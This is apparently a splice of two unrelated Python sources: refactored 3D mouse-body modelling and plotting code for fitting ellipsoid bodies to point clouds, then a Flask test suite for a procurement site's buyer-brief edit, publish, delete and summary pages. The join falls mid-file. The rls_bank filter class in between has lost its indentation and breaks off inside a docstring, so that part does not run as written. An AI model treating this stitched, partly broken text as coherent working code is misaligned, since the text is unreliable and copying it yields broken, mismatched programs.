    Fix vs. original: the nose's quadric was written into a scratch buffer
    (Q_inner) that was then never used — Q_nose was rebuilt from np.diag.
    The dead buffer mutation is removed and both quadrics are now built the
    same way (numerically identical results).

    Args:
        part: indexable of >= 10 scalars:
            [0:3] alpha, beta, gamma — hip rotation angles
            [3]   s                  — spine scaling in [0, 1]
            [4:7] psi, theta, phi    — head rotation angles
            [7:10] t_body            — world translation of the hip centre
        body_constants: 11-tuple (body_scale, a_hip_min, a_hip_max,
            b_hip_min, b_hip_max, a_nose, b_nose, d_nose, x_impl, z_impl,
            r_impl); r_impl is unused here but kept for a uniform unpack.

    Returns:
        R_body, R_nose, c_mid, c_hip, c_nose, c_impl,
        a_hip, b_hip, a_nose, b_nose, Q_hip, Q_nose
        NOTE(review): c_mid is returned in the body frame while c_hip,
        c_nose and c_impl are transformed to world coordinates — confirm
        callers expect this asymmetry.
    """
    body_scale, a_hip_min, a_hip_max, b_hip_min, b_hip_max, a_nose, b_nose, d_nose, x_impl, z_impl, r_impl = body_constants
    alpha = part[0]
    beta = part[1]
    gamma = part[2]
    s = part[3]
    psi = part[4]
    theta = part[5]
    phi = part[6]
    t_body = part[7:10]
    # Hip ellipsoid radii interpolate with the spine scale s:
    # elongates (a grows with s) while thinning (b shrinks with s).
    a_hip_0 = body_scale * a_hip_min
    a_hip_delta = body_scale * (a_hip_max - a_hip_min)
    b_hip_0 = body_scale * b_hip_min
    b_hip_delta = body_scale * (b_hip_max - b_hip_min)
    a_hip = a_hip_0 + s * a_hip_delta
    b_hip = b_hip_0 + (1 - s) * b_hip_delta
    # Empirical offset of the mid (spine) point from the hip centre.
    d_hip = .75 * a_hip
    R_body = rotate_body_model(alpha, beta, gamma)
    R_head = rotate_body_model(psi, theta, phi)
    R_nose = R_body @ R_head
    # Ellipsoid quadrics: Q = R @ diag(1/a^2, 1/b^2, 1/b^2) @ R.T
    Q_hip = R_body @ np.diag(np.array([1 / a_hip**2, 1 / b_hip**2, 1 / b_hip**2])) @ R_body.T
    Q_nose = R_nose @ np.diag(np.array([1 / a_nose**2, 1 / b_nose**2, 1 / b_nose**2])) @ R_nose.T
    # Spine coordinates in the body frame.
    c_hip = np.array([0, 0, 0])
    c_mid = np.array([d_hip, 0, 0])
    c_nose = c_mid + R_head @ np.array([d_nose, 0, 0])
    c_impl = c_mid + R_head @ np.array([x_impl, 0, z_impl])
    # Transform to world coordinates (c_hip is the origin, so only translated).
    c_hip = c_hip + t_body
    c_nose = R_body @ c_nose + t_body
    c_impl = R_body @ c_impl + t_body
    return R_body, R_nose, c_mid, c_hip, c_nose, c_impl, a_hip, b_hip, a_nose, b_nose, Q_hip, Q_nose
def _plot_ellipsoid(ax, R, centre, r_x, r_y, r_z, color, plot_alpha):
    """Wireframe-plot one ellipsoid with semi-axes (r_x, r_y, r_z), rotated by R and centred at `centre`."""
    u, v = np.mgrid[0:2 * np.pi:20j, 0:np.pi:10j]
    # Parametric mesh of the ellipsoid surface in its own frame.
    x = np.cos(u) * r_x
    y = np.sin(u) * np.sin(v) * r_y
    z = np.sin(u) * np.cos(v) * r_z
    pts = np.vstack((x.ravel(), y.ravel(), z.ravel()))
    pts = R @ pts + centre[:, np.newaxis]
    xs = pts[0, :].reshape(u.shape)
    ys = pts[1, :].reshape(u.shape)
    zs = pts[2, :].reshape(u.shape)
    return ax.plot_wireframe(xs, ys, zs, color=color, alpha=plot_alpha)

def add_torch_mouse_for_video(ax, part, body_constants, color='r', plot_alpha=.7, implant=False):
    """
    Draw one fitted mouse body (hip + nose ellipsoids, optionally the implant
    sphere) on a 3D matplotlib axis.

    Fix vs. original: the three near-identical 15-line meshing sections are
    factored into _plot_ellipsoid, the unused angle unpacking is removed,
    and the wireframe handles (previously computed and dropped) are now
    returned; callers that ignore the return value are unaffected.

    Args:
        ax: 3D axis providing plot_wireframe.
        part: particle vector, passed through to torch_mouse_body_geometry.
        body_constants: 11-tuple; only r_impl is read directly here.
        color: hip wireframe color; the nose is always green and the
            implant blue (matches original behaviour).
        plot_alpha: wireframe transparency.
        implant: also draw the implant sphere when True.

    Returns:
        (h_hip, h_nose, h_impl); h_impl is None unless implant=True.
    """
    r_impl = body_constants[10]
    R_body, R_nose, c_mid, c_hip, c_nose, c_impl, a_hip, b_hip, a_nose, b_nose, Q_hip, Q_nose = torch_mouse_body_geometry(part, body_constants)
    # Hip ellipsoid in the caller-chosen color.
    h_hip = _plot_ellipsoid(ax, R_body, c_hip, a_hip, b_hip, b_hip, color, plot_alpha)
    # Nose ellipsoid.
    h_nose = _plot_ellipsoid(ax, R_nose, c_nose, a_nose, b_nose, b_nose, 'green', plot_alpha)
    h_impl = None
    if implant:
        # Implant is a sphere of radius r_impl attached to the head.
        h_impl = _plot_ellipsoid(ax, R_nose, c_impl, r_impl, r_impl, r_impl, 'blue', plot_alpha)
    return h_hip, h_nose, h_impl
#%%
def close_4d(ax, positions):
    """
    Set fixed limits and axis labels on a 3D axis.

    The `positions` argument is kept for interface compatibility only: the
    original computed data-driven mid/max values from it and then immediately
    overwrote them with the hard-coded arena volume below, so that dead
    computation has been removed.

    Args:
        ax: 3D axis providing set_{x,y,z}lim / set_{x,y,z}label.
        positions: unused (historically an (N, 3) point array).
    """
    # NOTE(review): labels say mm but the hard-coded limits (±0.3, 0–0.6)
    # look like metres — confirm the intended unit.
    ax.set_xlim(-.3, .3)
    ax.set_ylim(-.3, .3)
    ax.set_zlim(0, .6)
    ax.set_xlabel('x (mm)', fontsize=16)
    ax.set_ylabel('y (mm)', fontsize=16)
    ax.set_zlabel('z (mm)', fontsize=16)
def plot_particles(ax,particles,positions,body_constants,alpha = 0.1,keyp = None,ikeyp = None,body_supports=None,single = False):
    """
    Scatter the point cloud and overlay one fitted mouse body per particle.

    Args:
        ax: 3D axis (scatter / plot / plot_wireframe).
        particles: (n_particles, d) array, or a single 1-D particle which is
            promoted to a (1, d) batch. Rows longer than 10 entries are
            treated as two mice (first 10 values, then the rest).
        positions: (N, 3) point cloud drawn as black dots.
        body_constants: body-model constants passed to add_torch_mouse_for_video.
        alpha: wireframe transparency for the plotted bodies.
        keyp: optional keypoint array; keyp[i] is an xyz triple.
            NOTE(review): ikeyp has .numpy(), so presumably a torch tensor of
            per-keypoint body-part indices (0-3) — confirm.
        ikeyp: body-part index per keypoint, used to pick a color.
        body_supports: optional pair of 6-tuples of (1, 3, 1) tensors
            (c_hip, c_ass, c_mid, c_nose, c_tip, c_impl) for two mice; drawn
            as black dots connected by skeleton lines.
        single: if True, keep only the first 10 columns (one mouse).
    """
    if len(particles.shape) == 1:
        # Promote a single particle vector to a batch of one.
        particles = np.tile(particles,(1,1))
    if single:
        particles = particles[:,:10]
    # print(particles.shape)
    n_particles = particles.shape[0]
    # plot the particle mice!
    # adjust the bottom!
    scat = ax.scatter(positions[:,0],positions[:,1],positions[:,2],c='k',alpha=.2,marker='o',s=6)
    for i in range(n_particles):
        x_fit = particles[i,:]
        # First mouse (with implant); a second mouse uses the remaining columns.
        add_torch_mouse_for_video(ax,x_fit,body_constants,color = 'r',plot_alpha = alpha,implant=True)
        if len(x_fit) > 10:
            x_fit = x_fit[10:]
            add_torch_mouse_for_video(ax,x_fit,body_constants,color = 'r',plot_alpha = alpha,implant=False)
    # close_4d(ax,positions)
    fz = 10
    # ax.set_xlabel('x (mm)',fontsize=6)
    # ax.set_ylabel('y (mm)',fontsize=6)
    # zlabel = ax.set_zlabel('z (mm)',fontsize=6)
    if keyp is not None:
        # One color per body-part index.
        body_colors = ['dodgerblue','red','lime','orange']
        for i,body in enumerate(ikeyp.numpy()):
            ax.scatter(keyp[i,0], keyp[i,1], keyp[i,2], zdir='z', s=100, c=body_colors[int(body)],rasterized=True)
    if body_supports is not None:
        # First mouse: support points plus skeleton segments (incl. implant).
        for pp in body_supports[0][:]:
            pp = pp[0,:,0].numpy()
            ax.scatter(pp[0], pp[1], pp[2], zdir='z', s=100, c='k',rasterized=True)
        c_hip,c_ass,c_mid,c_nose,c_tip,c_impl = body_supports[0]
        ax.plot([c_mid[0,0,0],c_ass[0,0,0]],[c_mid[0,1,0],c_ass[0,1,0]],[c_mid[0,2,0],c_ass[0,2,0]],c='k')
        ax.plot([c_mid[0,0,0],c_nose[0,0,0]],[c_mid[0,1,0],c_nose[0,1,0]],[c_mid[0,2,0],c_nose[0,2,0]],c='k')
        ax.plot([c_mid[0,0,0],c_tip[0,0,0]],[c_mid[0,1,0],c_tip[0,1,0]],[c_mid[0,2,0],c_tip[0,2,0]],c='k')
        ax.plot([c_impl[0,0,0],c_nose[0,0,0]],[c_impl[0,1,0],c_nose[0,1,0]],[c_impl[0,2,0],c_nose[0,2,0]],c='k')
        ax.plot([c_impl[0,0,0],c_tip[0,0,0]],[c_impl[0,1,0],c_tip[0,1,0]],[c_impl[0,2,0],c_tip[0,2,0]],c='k')
        # Second mouse: only the first 5 support points and no implant segments.
        for pp in body_supports[1][:5]:
            pp = pp[0,:,0].numpy()
            ax.scatter(pp[0], pp[1], pp[2], zdir='z', s=100, c='k',rasterized=True)
        c_hip,c_ass,c_mid,c_nose,c_tip,c_impl = body_supports[1]
        ax.plot([c_mid[0,0,0],c_ass[0,0,0]],[c_mid[0,1,0],c_ass[0,1,0]],[c_mid[0,2,0],c_ass[0,2,0]],c='k')
        ax.plot([c_mid[0,0,0],c_nose[0,0,0]],[c_mid[0,1,0],c_nose[0,1,0]],[c_mid[0,2,0],c_nose[0,2,0]],c='k')
        ax.plot([c_mid[0,0,0],c_tip[0,0,0]],[c_mid[0,1,0],c_tip[0,1,0]],[c_mid[0,2,0],c_tip[0,2,0]],c='k')
    ax.xaxis.label.set_size(fz)
    ax.yaxis.label.set_size(fz)
    ax.zaxis.label.set_size(fz)
def plot_fitted_mouse(positions,x0_start,best_mouse, keyp = None, ikeyp = None,body_supports=None):
    """
    Show a side-by-side 3D comparison of the initial and fitted mouse body.

    Left panel: the starting particle x0_start; right panel: best_mouse after
    optimization. keyp/ikeyp/body_supports are forwarded to plot_particles.

    NOTE(review): reads the module-level global `body_constants` (not a
    parameter) — confirm it is defined before this is called.
    """
    # the winning mouse is the one, with the lowest final loss
    #end_loss = [np.mean(ll[-1:]) for ll in ll_holder]
    #best_idx = np.argmin(end_loss)
    #best_mouse = best_holder[best_idx]
    which_opt = 0
    opt_names = ['geoLM']
    # i_frame = 0
    #fig,ax = open_3d()
    fig = plt.figure(figsize=(15,7.5))
    ax = fig.add_subplot(1, 2, 1, projection='3d')
    plot_particles(ax,x0_start,positions,body_constants,alpha = .5,keyp = keyp, ikeyp = ikeyp,body_supports=body_supports)
    ax.set_title("Initial clicked mouse")
    ax = fig.add_subplot(1, 2, 2, projection='3d')
    plot_particles(ax,best_mouse,positions,body_constants,alpha = .5,keyp = keyp, ikeyp = ikeyp,body_supports=body_supports)
    ax.set_title("After fitting w. "+opt_names[which_opt])
    plt.show()
class rls_bank:
def __init__(self,embedding = 9):
# try to make everything [batch x embedding], i.e. [n_vars X embedding X ...]
self.embedding = embedding
self.mu = 0.99
self.eps = 0.1
self.n_vars = 20
self.w = torch.zeros((self.n_vars,self.embedding))
# by convention (I think?) the most recent is on the left
# self.w[:,0] += 1.
single_R = 1/self.eps * torch.eye(self.embedding)
single_R = single_R.reshape((1, self.embedding, self.embedding))
self.R = single_R.repeat(self.n_vars, 1, 1)
# and make a stanck
self.Rnp = 1/self.eps * np.eye(self.embedding)
def adapt(self,d,x):
"""
Adapt weights according one desired value and its input.
**Args:**
* `d` : desired value (float)
* `x` : input array (1-dimensional array)
| |
lots=[
api_stubs.lot(slug='digital-specialists', allows_brief=True),
]
)
data_api_client.get_brief.return_value = api_stubs.brief()
content_fixture = ContentLoader('tests/fixtures/content')
content_fixture.load_manifest('dos', 'data', 'edit_brief')
content_loader.get_manifest.return_value = content_fixture.get_manifest('dos', 'edit_brief')
res = self.client.post(
"/buyers/frameworks/digital-outcomes-and-specialists/requirements/"
"digital-specialists/1234/edit/section-4/optional2",
data={
"optional2": True
})
assert res.status_code == 302
data_api_client.update_brief.assert_called_with(
'1234',
{"optional2": True},
page_questions=['optional2'],
updated_by='<EMAIL>'
)
assert res.headers['Location'].endswith(
'buyers/frameworks/digital-outcomes-and-specialists/requirements/digital-specialists/1234/section-4'
) is True
@mock.patch("app.buyers.views.buyers.content_loader")
def test_post_update_if_single_question_no_description_redirects_to_overview(self, content_loader, data_api_client):
    """Posting a single question outside the description section updates the brief and redirects to its overview page."""
    self.login_as_buyer()
    data_api_client.get_framework.return_value = api_stubs.framework(
        slug='digital-outcomes-and-specialists',
        status='live',
        lots=[
            api_stubs.lot(slug='digital-specialists', allows_brief=True),
        ]
    )
    data_api_client.get_brief.return_value = api_stubs.brief()
    content_fixture = ContentLoader('tests/fixtures/content')
    content_fixture.load_manifest('dos', 'data', 'edit_brief')
    content_loader.get_manifest.return_value = content_fixture.get_manifest('dos', 'edit_brief')
    res = self.client.post(
        "/buyers/frameworks/digital-outcomes-and-specialists/requirements/"
        "digital-specialists/1234/edit/section-2/required2",
        data={
            "required2": True
        })
    assert res.status_code == 302
    data_api_client.update_brief.assert_called_with(
        '1234',
        {"required2": True},
        page_questions=['required2'],
        updated_by='<EMAIL>'
    )
    # endswith() already returns a bool; the original `... is True` comparison
    # was redundant and has been dropped.
    assert res.headers['Location'].endswith(
        'buyers/frameworks/digital-outcomes-and-specialists/requirements/digital-specialists/1234'
    )
def test_404_if_brief_does_not_belong_to_user(self, data_api_client):
    """Editing a brief owned by another user must 404 and not update anything."""
    self.login_as_buyer()
    data_api_client.get_framework.return_value = api_stubs.framework(
        slug='digital-outcomes-and-specialists',
        status='live',
        lots=[api_stubs.lot(slug='digital-specialists', allows_brief=True)],
    )
    # The stubbed brief belongs to user 234, not the logged-in buyer.
    data_api_client.get_brief.return_value = api_stubs.brief(user_id=234)
    url = (
        "/buyers/frameworks/digital-outcomes-and-specialists/requirements/"
        "digital-specialists/1234/edit/description-of-work/organisation"
    )
    res = self.client.post(url, data={"organisation": "GDS"})
    assert res.status_code == 404
    assert not data_api_client.update_brief.called
def test_404_if_lot_does_not_allow_brief(self, data_api_client):
    """Editing a brief on a lot that does not allow briefs must 404."""
    self.login_as_buyer()
    data_api_client.get_framework.return_value = api_stubs.framework(
        slug='digital-outcomes-and-specialists',
        status='live',
        # Lot exists but briefs are disabled on it.
        lots=[api_stubs.lot(slug='digital-specialists', allows_brief=False)],
    )
    data_api_client.get_brief.return_value = api_stubs.brief()
    url = (
        "/buyers/frameworks/digital-outcomes-and-specialists/requirements/"
        "digital-specialists/1234/edit/description-of-work/organisation"
    )
    res = self.client.post(url, data={"title": "A new title"})
    assert res.status_code == 404
    assert not data_api_client.update_brief.called
def test_404_if_lot_does_not_exist(self, data_api_client):
    """Editing a brief under an unknown lot slug must 404."""
    self.login_as_buyer()
    data_api_client.get_framework.return_value = api_stubs.framework(
        slug='digital-outcomes-and-specialists',
        status='live',
        lots=[api_stubs.lot(slug='digital-specialists', allows_brief=True)],
    )
    data_api_client.get_brief.return_value = api_stubs.brief()
    # 'digital-octopuses' is not a lot on the stubbed framework.
    url = (
        "/buyers/frameworks/digital-outcomes-and-specialists/requirements/"
        "digital-octopuses/1234/edit/description-of-work/organisation"
    )
    res = self.client.post(url, data={"title": "A new title"})
    assert res.status_code == 404
    assert not data_api_client.update_brief.called
def test_404_if_framework_status_is_not_live(self, data_api_client):
    """Editing a brief on a non-live framework must 404."""
    self.login_as_buyer()
    data_api_client.get_framework.return_value = api_stubs.framework(
        slug='digital-outcomes-and-specialists',
        # Framework is still open, not live.
        status='open',
        lots=[api_stubs.lot(slug='digital-specialists', allows_brief=True)],
    )
    data_api_client.get_brief.return_value = api_stubs.brief()
    url = (
        "/buyers/frameworks/digital-outcomes-and-specialists/requirements/"
        "digital-specialists/1234/edit/description-of-work/organisation"
    )
    res = self.client.post(url, data={"title": "A new title"})
    assert res.status_code == 404
    assert not data_api_client.update_brief.called
def test_404_if_brief_is_already_live(self, data_api_client):
    """Editing a brief that is already live must 404."""
    self.login_as_buyer()
    data_api_client.get_framework.return_value = api_stubs.framework(
        slug='digital-outcomes-and-specialists',
        status='live',
        lots=[api_stubs.lot(slug='digital-specialists', allows_brief=True)],
    )
    # Live briefs may no longer be edited.
    data_api_client.get_brief.return_value = api_stubs.brief(status='live')
    url = (
        "/buyers/frameworks/digital-outcomes-and-specialists/requirements/"
        "digital-specialists/1234/edit/description-of-work/organisation"
    )
    res = self.client.post(url, data={"title": "A new title"})
    assert res.status_code == 404
    assert not data_api_client.update_brief.called
def test_404_if_question_does_not_exist(self, data_api_client):
    """Editing an unknown question id must 404."""
    self.login_as_buyer()
    data_api_client.get_framework.return_value = api_stubs.framework(
        slug='digital-outcomes-and-specialists',
        status='live',
        lots=[api_stubs.lot(slug='digital-specialists', allows_brief=True)],
    )
    data_api_client.get_brief.return_value = api_stubs.brief()
    # 'some-made-up-question' is not in the edit_brief manifest.
    url = (
        "/buyers/frameworks/digital-outcomes-and-specialists/requirements/"
        "digital-specialists/1234/edit/description-of-work/some-made-up-question"
    )
    res = self.client.post(url, data={"title": "A new title"})
    assert res.status_code == 404
    assert not data_api_client.update_brief.called
@mock.patch('app.buyers.views.buyers.data_api_client')
class TestPublishBrief(BaseApplicationTest):
    """Tests for publishing a brief (POST .../publish) and the publish page (GET)."""

    def test_publish_brief(self, data_api_client):
        """A draft brief with every required question answered publishes and redirects to its overview."""
        self.login_as_buyer()
        data_api_client.get_framework.return_value = api_stubs.framework(
            slug='digital-outcomes-and-specialists',
            status='live',
            lots=[
                api_stubs.lot(slug='digital-specialists', allows_brief=True)
            ]
        )
        brief_json = api_stubs.brief(status="draft")
        brief_questions = brief_json['briefs']
        # answer every required question so publish validation passes
        brief_questions.update({
            'backgroundInformation': 'test background info',
            'contractLength': 'A very long time',
            'culturalFitCriteria': ['CULTURAL', 'FIT'],
            'culturalWeighting': 10,
            'essentialRequirements': 'Everything',
            'evaluationType': 'test evaluation type',
            'existingTeam': 'team team team',
            'importantDates': 'Near future',
            'numberOfSuppliers': 5,
            'location': 'somewhere',
            'organisation': 'test organisation',
            'priceWeighting': 80,
            'specialistRole': 'communicationsManager',
            'specialistWork': 'work work work',
            'startDate': 'startDate',
            'summary': 'blah',
            'technicalWeighting': 10,
            'workingArrangements': 'arrangements',
            'workplaceAddress': 'address',
        })
        data_api_client.get_brief.return_value = brief_json

        res = self.client.post("/buyers/frameworks/digital-outcomes-and-specialists/requirements/"
                               "digital-specialists/1234/publish")

        assert res.status_code == 302
        assert data_api_client.update_brief_status.called
        assert res.location == "http://localhost/buyers/frameworks/digital-outcomes-and-specialists/" \
                               "requirements/digital-specialists/1234"

    def test_publish_brief_with_unanswered_required_questions(self, data_api_client):
        """Publishing an incomplete brief is rejected with 400 and no status update."""
        self.login_as_buyer()
        data_api_client.get_framework.return_value = api_stubs.framework(
            slug='digital-outcomes-and-specialists',
            status='live',
            lots=[
                api_stubs.lot(slug='digital-specialists', allows_brief=True)
            ]
        )
        data_api_client.get_brief.return_value = api_stubs.brief(status="draft")

        res = self.client.post("/buyers/frameworks/digital-outcomes-and-specialists/requirements/"
                               "digital-specialists/1234/publish")

        assert res.status_code == 400
        assert not data_api_client.update_brief_status.called

    def test_404_if_brief_does_not_belong_to_user(self, data_api_client):
        """Another user's brief 404s without being updated."""
        # NOTE(review): this posts to an *edit* URL rather than /publish —
        # looks copy-pasted from the edit tests; confirm intended coverage.
        self.login_as_buyer()
        data_api_client.get_framework.return_value = api_stubs.framework(
            slug='digital-outcomes-and-specialists',
            status='live',
            lots=[
                api_stubs.lot(slug='digital-specialists', allows_brief=True)
            ]
        )
        data_api_client.get_brief.return_value = api_stubs.brief(user_id=234)

        res = self.client.post(
            "/buyers/frameworks/digital-outcomes-and-specialists/requirements/"
            "digital-specialists/1234/edit/your-organisation",
            data={
                "organisation": "GDS"
            })

        assert res.status_code == 404
        assert not data_api_client.update_brief.called

    def test_publish_button_available_if_questions_answered(self, data_api_client):
        """The publish page shows 'Publish Requirements' once every question is answered."""
        self.login_as_buyer()
        data_api_client.get_framework.return_value = api_stubs.framework(
            slug='digital-outcomes-and-specialists',
            status='live',
            lots=[
                api_stubs.lot(slug='digital-specialists', allows_brief=True)
            ]
        )
        brief_json = api_stubs.brief(status="draft")
        brief_questions = brief_json['briefs']
        # answer every required question so the publish button is rendered
        brief_questions.update({
            'backgroundInformation': 'test background info',
            'contractLength': 'A very long time',
            'culturalFitCriteria': ['CULTURAL', 'FIT'],
            'culturalWeighting': 10,
            'essentialRequirements': 'Everything',
            'evaluationType': 'test evaluation type',
            'existingTeam': 'team team team',
            'importantDates': 'Near future',
            'location': 'somewhere',
            'numberOfSuppliers': 3,
            'organisation': 'test organisation',
            'priceWeighting': 80,
            'specialistRole': 'communicationsManager',
            'specialistWork': 'work work work',
            'startDate': 'startDate',
            'summary': 'blah',
            'technicalWeighting': 10,
            'workingArrangements': 'arrangements',
            'workplaceAddress': 'address',
        })
        data_api_client.get_brief.return_value = brief_json

        res = self.client.get("/buyers/frameworks/digital-outcomes-and-specialists/requirements/"
                              "digital-specialists/1234/publish")
        page_html = res.get_data(as_text=True)

        assert res.status_code == 200
        assert 'Publish Requirements' in page_html, page_html

    def test_publish_button_unavailable_if_questions_not_answered(self, data_api_client):
        """The publish page hides 'Publish Requirements' while required questions are unanswered."""
        self.login_as_buyer()
        data_api_client.get_framework.return_value = api_stubs.framework(
            slug='digital-outcomes-and-specialists',
            status='live',
            lots=[
                api_stubs.lot(slug='digital-specialists', allows_brief=True)
            ]
        )
        data_api_client.get_brief.return_value = api_stubs.brief(status="draft")

        res = self.client.get("/buyers/frameworks/digital-outcomes-and-specialists/requirements/"
                              "digital-specialists/1234/publish")
        page_html = res.get_data(as_text=True)

        assert res.status_code == 200
        assert 'Publish Requirements' not in page_html
@mock.patch('app.buyers.views.buyers.data_api_client')
class TestDeleteBriefSubmission(BaseApplicationTest):
    """Tests for deleting a draft brief (POST .../delete)."""

    def test_delete_brief_submission(self, data_api_client):
        """Deleting a draft brief succeeds and redirects to the buyer dashboard."""
        self.login_as_buyer()
        data_api_client.get_framework.return_value = api_stubs.framework(
            slug='digital-outcomes-and-specialists',
            status='live',
            lots=[
                api_stubs.lot(slug='digital-specialists', allows_brief=True)
            ]
        )
        data_api_client.get_brief.return_value = api_stubs.brief()

        res = self.client.post(
            "/buyers/frameworks/digital-outcomes-and-specialists/requirements/digital-specialists/1234/delete"
        )

        assert res.status_code == 302
        assert data_api_client.delete_brief.called
        assert res.location == "http://localhost/buyers"

    def test_404_if_framework_is_not_live(self, data_api_client):
        """Deletion is blocked (404) when the framework is not live."""
        self.login_as_buyer()
        data_api_client.get_framework.return_value = api_stubs.framework(
            slug='digital-outcomes-and-specialists',
            status='standstill',
            lots=[
                api_stubs.lot(slug='digital-specialists', allows_brief=True)
            ]
        )
        data_api_client.get_brief.return_value = api_stubs.brief()

        res = self.client.post(
            "/buyers/frameworks/digital-outcomes-and-specialists/requirements/digital-specialists/1234/delete",
        )

        assert res.status_code == 404
        assert not data_api_client.delete_brief.called

    def test_cannot_delete_live_brief(self, data_api_client):
        """A brief that is already live cannot be deleted."""
        self.login_as_buyer()
        data_api_client.get_framework.return_value = api_stubs.framework(
            slug='digital-outcomes-and-specialists',
            status='live',
            lots=[
                api_stubs.lot(slug='digital-specialists', allows_brief=True)
            ]
        )
        data_api_client.get_brief.return_value = api_stubs.brief(status='live')

        res = self.client.post(
            "/buyers/frameworks/digital-outcomes-and-specialists/requirements/digital-specialists/1234/delete",
        )

        assert res.status_code == 404
        assert not data_api_client.delete_brief.called

    def test_404_if_brief_does_not_belong_to_user(self, data_api_client):
        """Another user's brief cannot be deleted."""
        self.login_as_buyer()
        data_api_client.get_framework.return_value = api_stubs.framework(
            slug='digital-outcomes-and-specialists',
            status='live',
            lots=[
                api_stubs.lot(slug='digital-specialists', allows_brief=True)
            ]
        )
        data_api_client.get_brief.return_value = api_stubs.brief(user_id=234)

        res = self.client.post(
            "/buyers/frameworks/digital-outcomes-and-specialists/requirements/"
            "digital-specialists/1234/delete",
            data={"delete_confirmed": True})

        assert res.status_code == 404
@mock.patch('app.buyers.views.buyers.data_api_client')
class TestBriefSummaryPage(BaseApplicationTest):
    def test_show_draft_brief_summary_page(self, data_api_client):
        """Draft brief overview shows edit-section links, guidance links, and a Delete link."""
        with self.app.app_context():
            self.login_as_buyer()
            data_api_client.get_framework.return_value = api_stubs.framework(
                slug='digital-outcomes-and-specialists',
                status='live',
                lots=[
                    api_stubs.lot(slug='digital-specialists', allows_brief=True),
                ]
            )
            brief_json = api_stubs.brief(status="draft")
            brief_json['briefs']['specialistRole'] = 'communicationsManager'
            data_api_client.get_brief.return_value = brief_json

            res = self.client.get(
                "/buyers/frameworks/digital-outcomes-and-specialists/requirements/digital-specialists/1234"
            )

            assert res.status_code == 200
            page_html = res.get_data(as_text=True)
            document = html.fromstring(page_html)
            assert (document.xpath('//h1')[0]).text_content().strip() == "I need a thing to do a thing"
            # exact ordered list of links expected on a *draft* brief page
            assert [e.text_content() for e in document.xpath('//main[@id="content"]//ul/li/a')] == [
                'title',
                'specialist role',
                'location',
                'description of work',
                'shortlist criteria',
                'evaluation criteria',
                'Review and publish your requirements',
                'How to answer supplier questions',
                'How to shortlist suppliers',
                'How to evaluate suppliers',
                'How to award a contract',
            ]
            # drafts can still be deleted
            assert document.xpath('//a[contains(text(), "Delete")]')
    def test_show_live_brief_summary_page(self, data_api_client):
        """Live brief overview shows published-requirements links and no Delete link."""
        with self.app.app_context():
            self.login_as_buyer()
            data_api_client.get_framework.return_value = api_stubs.framework(
                slug='digital-outcomes-and-specialists',
                status='live',
                lots=[
                    api_stubs.lot(slug='digital-specialists', allows_brief=True),
                ]
            )
            brief_json = api_stubs.brief(status="live")
            brief_json['briefs']['publishedAt'] = "2016-04-02T20:10:00.00000Z"
            brief_json['briefs']['specialistRole'] = 'communicationsManager'
            brief_json['briefs']["clarificationQuestionsAreClosed"] = True
            data_api_client.get_brief.return_value = brief_json

            res = self.client.get(
                "/buyers/frameworks/digital-outcomes-and-specialists/requirements/digital-specialists/1234"
            )

            assert res.status_code == 200
            page_html = res.get_data(as_text=True)
            document = html.fromstring(page_html)
            assert (document.xpath('//h1')[0]).text_content().strip() == "I need a thing to do a thing"
            # exact ordered list of links expected on a *live* brief page
            assert [e.text_content() for e in document.xpath('//main[@id="content"]//ul/li/a')] == [
                'View published requirements',
                'Publish questions and answers',
                'How to answer supplier questions',
                'How to shortlist suppliers',
                'How to evaluate suppliers',
                'How to award a contract',
            ]
            # live briefs cannot be deleted
            assert not document.xpath('//a[contains(text(), "Delete")]')
    def test_show_closed_brief_summary_page(self, data_api_client):
        """Closed brief overview shows shortlist links and no Delete link."""
        with self.app.app_context():
            self.login_as_buyer()
            data_api_client.get_framework.return_value = api_stubs.framework(
                slug='digital-outcomes-and-specialists',
                status='live',
                lots=[
                    api_stubs.lot(slug='digital-specialists', allows_brief=True),
                ]
            )
            brief_json = api_stubs.brief(status="closed")
            brief_json['briefs']['publishedAt'] = "2016-04-02T20:10:00.00000Z"
            brief_json['briefs']['specialistRole'] = 'communicationsManager'
            brief_json['briefs']["clarificationQuestionsAreClosed"] = True
            data_api_client.get_brief.return_value = brief_json

            res = self.client.get(
                "/buyers/frameworks/digital-outcomes-and-specialists/requirements/digital-specialists/1234"
            )

            assert res.status_code == 200
            page_html = res.get_data(as_text=True)
            document = html.fromstring(page_html)
            assert (document.xpath('//h1')[0]).text_content().strip() == "I need a thing to do a thing"
            # exact ordered list of links expected on a *closed* brief page
            assert [e.text_content() for e in document.xpath('//main[@id="content"]//ul/li/a')] == [
                'View published requirements',
                'View and shortlist suppliers',
                'How to shortlist suppliers',
                'How to evaluate suppliers',
                'How to award a contract',
            ]
            # closed briefs cannot be deleted
            assert not document.xpath('//a[contains(text(), "Delete")]')
    def test_show_clarification_questions_page_for_live_brief_with_no_questions(self, data_api_client):
        """Supplier-questions page for a live brief without questions shows the empty-state copy."""
        with self.app.app_context():
            self.login_as_buyer()
            data_api_client.get_framework.return_value = api_stubs.framework(
                slug='digital-outcomes-and-specialists',
                status='live',
                lots=[
                    api_stubs.lot(slug='digital-specialists', allows_brief=True),
                ]
            )
            brief_json = api_stubs.brief(status="live")
            brief_json['briefs']['publishedAt'] = "2016-04-02T20:10:00.00000Z"
            # questions still open, so the answer link must be present
            brief_json['briefs']["clarificationQuestionsAreClosed"] = False
            data_api_client.get_brief.return_value = brief_json

            res = self.client.get(
                "/buyers/frameworks/digital-outcomes-and-specialists/requirements/digital-specialists/1234/supplier-questions"  # noqa
            )

            assert res.status_code == 200
            page_html = res.get_data(as_text=True)
            assert "Supplier questions" in page_html
            assert "No questions or answers have been published" in page_html
            assert "Answer a supplier question" in page_html
    def test_show_clarification_questions_page_for_live_brief_with_one_question(self, data_api_client):
        """Supplier-questions page renders a published question/answer and hides the empty-state copy."""
        with self.app.app_context():
            self.login_as_buyer()
            data_api_client.get_framework.return_value = api_stubs.framework(
                slug='digital-outcomes-and-specialists',
                status='live',
                lots=[
                    api_stubs.lot(slug='digital-specialists', allows_brief=True),
                ]
            )
            brief_json = api_stubs.brief(status="live", clarification_questions=[
                {"question": "Why is my question a question?",
                 "answer": "Because",
                 "publishedAt": "2016-01-01T00:00:00.000000Z"}
            ])
            brief_json['briefs']['publishedAt'] = "2016-04-02T20:10:00.00000Z"
            brief_json['briefs']["clarificationQuestionsAreClosed"] = True
            data_api_client.get_brief.return_value = brief_json

            res = self.client.get(
                "/buyers/frameworks/digital-outcomes-and-specialists/requirements/digital-specialists/1234/supplier-questions"  # noqa
            )

            assert res.status_code == 200
            page_html = res.get_data(as_text=True)
